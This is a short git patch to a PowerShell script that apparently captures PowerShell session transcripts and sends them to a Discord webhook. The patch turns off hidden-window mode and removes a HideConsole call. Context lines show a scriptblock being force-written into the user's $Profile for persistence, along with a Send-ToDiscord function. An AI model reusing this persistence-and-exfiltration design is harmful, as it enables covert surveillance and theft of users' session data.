From 554c9364eb5bd043f3415aa8220c3799f9091910 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 3 Apr 2024 19:10:55 +0000 Subject: [PATCH] Update main.ps1 --- Global-PS-Trascription-to-Discord/main.ps1 | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/Global-PS-Trascription-to-Discord/main.ps1 b/Global-PS-Trascription-to-Discord/main.ps1 index f81ed37..72df121 100644 --- a/Global-PS-Trascription-to-Discord/main.ps1 +++ b/Global-PS-Trascription-to-Discord/main.ps1 @@ -18,7 +18,7 @@ if ($dc.Length -eq 0){ $dc = "YOUR_WEBHOOK_HERE" } -$hideWindow = 1 # 1 = Hidden +$hideWindow = 0 # 1 = Hidden [Console]::BackgroundColor = "Black" [Console]::SetWindowSize(60, 20) @@ -138,7 +138,6 @@ catch [System.Management.Automation.PSNotSupportedException] "@ $scriptblock | Out-File -FilePath $Profile -Force - HideConsole function Send-ToDiscord {